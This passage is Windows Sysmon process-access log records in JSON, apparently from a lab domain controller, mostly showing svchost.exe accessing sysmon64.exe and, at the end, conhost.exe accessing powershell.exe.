1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:18.467","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:52:18","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:18","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4511,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:18.467\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:18.467","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:52:18","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:18","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4512,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:18.467\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:18.467","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:52:18","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:18","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4513,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:18.467\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:18.467","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:52:18","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:18","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4514,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:18.467\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:18.467","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:52:18","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:18","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4515,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:18.467\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:18.467","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:52:18","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:18","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4516,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:18.467\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:18.467","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:52:18","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:18","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4517,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:18.467\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:18.467","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:52:18","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:18","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4518,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:18.467\r\nSourceProcessGUID: {A837DB8D-0312-5F25-0000-001074B50600}\r\nSourceProcessId: 1256\r\nSourceThreadId: 2756\r\nSourceImage: C:\\Windows\\system32\\conhost.exe\r\nTargetProcessGUID: {A837DB8D-0312-5F25-0000-001089B80600}\r\nTargetProcessId: 3904\r\nTargetImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: 